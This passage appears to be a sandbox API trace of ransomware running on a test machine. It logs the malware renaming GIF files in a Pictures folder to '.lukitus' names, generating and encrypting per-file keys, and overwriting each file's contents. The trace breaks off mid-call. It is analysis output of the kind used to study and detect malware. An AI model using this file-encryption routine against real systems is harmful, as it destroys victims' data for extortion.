[0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.189] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\7EK45zr96-R7KlQSQB5.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\7ek45zr96-r7klqsqb5.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.189] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\7EK45zr96-R7KlQSQB5.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\7ek45zr96-r7klqsqb5.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-A080FC17-79D47057B610.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-a080fc17-79d47057b610.lukitus"), dwFlags=0x9) returned 1 [0108.190] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.190] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.195] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x85d0, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x85d0, lpOverlapped=0x0) returned 1 [0108.195] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.195] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x85d0, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x85d0, lpOverlapped=0x0) returned 1 [0108.196] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.196] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x648290f0, dwHighDateTime=0x1d31760)) [0108.196] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.196] FlushFileBuffers (hFile=0x328) returned 1 [0108.209] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\ogZmmq5hx8.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\ogzmmq5hx8.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f4263e0, ftCreationTime.dwHighDateTime=0x1d301d1, ftLastAccessTime.dwLowDateTime=0xc6d09570, ftLastAccessTime.dwHighDateTime=0x1d2f7dc, ftLastWriteTime.dwLowDateTime=0xc6d09570, ftLastWriteTime.dwHighDateTime=0x1d2f7dc, nFileSizeHigh=0x0, nFileSizeLow=0x97ef)) returned 1 [0108.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.210] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\ogZmmq5hx8.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\ogzmmq5hx8.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.211] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\ogZmmq5hx8.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\ogzmmq5hx8.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\F56924BE-9663-41BB-1D9631E8-90BF411C2FEE.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\f56924be-9663-41bb-1d9631e8-90bf411c2fee.lukitus"), dwFlags=0x9) returned 1 [0108.212] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.212] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.217] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x97ef, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x97ef, lpOverlapped=0x0) returned 1 [0108.218] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.218] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x97ef, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x97ef, lpOverlapped=0x0) returned 1 [0108.218] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.218] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x648753b0, dwHighDateTime=0x1d31760)) [0108.218] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.219] FlushFileBuffers (hFile=0x328) returned 1 [0108.223] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\QsiOxSCE.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\qsioxsce.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe32ed50, ftCreationTime.dwHighDateTime=0x1d2f715, ftLastAccessTime.dwLowDateTime=0x56515de0, ftLastAccessTime.dwHighDateTime=0x1d2f93d, ftLastWriteTime.dwLowDateTime=0x56515de0, ftLastWriteTime.dwHighDateTime=0x1d2f93d, nFileSizeHigh=0x0, nFileSizeLow=0x2324)) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.223] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\QsiOxSCE.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\qsioxsce.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.224] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\QsiOxSCE.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\qsioxsce.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\F56924BE-9663-41BB-8B683683-04F707D56484.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\f56924be-9663-41bb-8b683683-04f707d56484.lukitus"), dwFlags=0x9) returned 1 [0108.225] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.225] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.233] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x2324, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x2324, lpOverlapped=0x0) returned 1 [0108.233] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.233] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x2324, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x2324, lpOverlapped=0x0) returned 1 [0108.233] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.234] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6489b510, dwHighDateTime=0x1d31760)) [0108.234] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.234] FlushFileBuffers (hFile=0x328) returned 1 [0108.237] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\Y_FO-Az1Ng2.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\y_fo-az1ng2.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96849b50, ftCreationTime.dwHighDateTime=0x1d3010a, ftLastAccessTime.dwLowDateTime=0xc8455a90, ftLastAccessTime.dwHighDateTime=0x1d2f9de, ftLastWriteTime.dwLowDateTime=0xc8455a90, ftLastWriteTime.dwHighDateTime=0x1d2f9de, nFileSizeHigh=0x0, nFileSizeLow=0xf777)) returned 1 [0108.237] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.237] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.237] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.237] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.237] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.237] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.237] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.238] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\Y_FO-Az1Ng2.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\y_fo-az1ng2.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.238] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\Y_FO-Az1Ng2.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\y_fo-az1ng2.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\F56924BE-9663-41BB-ECB96FE5-208908824DC6.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\f56924be-9663-41bb-ecb96fe5-208908824dc6.lukitus"), dwFlags=0x9) returned 1 [0108.239] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.239] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.244] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf777, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf777, lpOverlapped=0x0) returned 1 [0108.245] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.245] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf777, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf777, lpOverlapped=0x0) returned 1 [0108.245] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.246] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x648c1670, dwHighDateTime=0x1d31760)) [0108.246] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.246] FlushFileBuffers (hFile=0x328) returned 1 [0108.253] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\AHEE1OIJ1w.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\ahee1oij1w.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8695d20, ftCreationTime.dwHighDateTime=0x1d3037d, ftLastAccessTime.dwLowDateTime=0xa4b8e420, ftLastAccessTime.dwHighDateTime=0x1d30433, ftLastWriteTime.dwLowDateTime=0xa4b8e420, ftLastWriteTime.dwHighDateTime=0x1d30433, nFileSizeHigh=0x0, nFileSizeLow=0x5dbf)) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.253] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.255] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\AHEE1OIJ1w.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\ahee1oij1w.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.255] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\AHEE1OIJ1w.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\ahee1oij1w.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-61116ECA-F6682086BE7A.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-61116eca-f6682086be7a.lukitus"), dwFlags=0x9) returned 1 [0108.257] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.257] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.262] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x5dbf, lpNumberOfBytesRead=0x281f598, 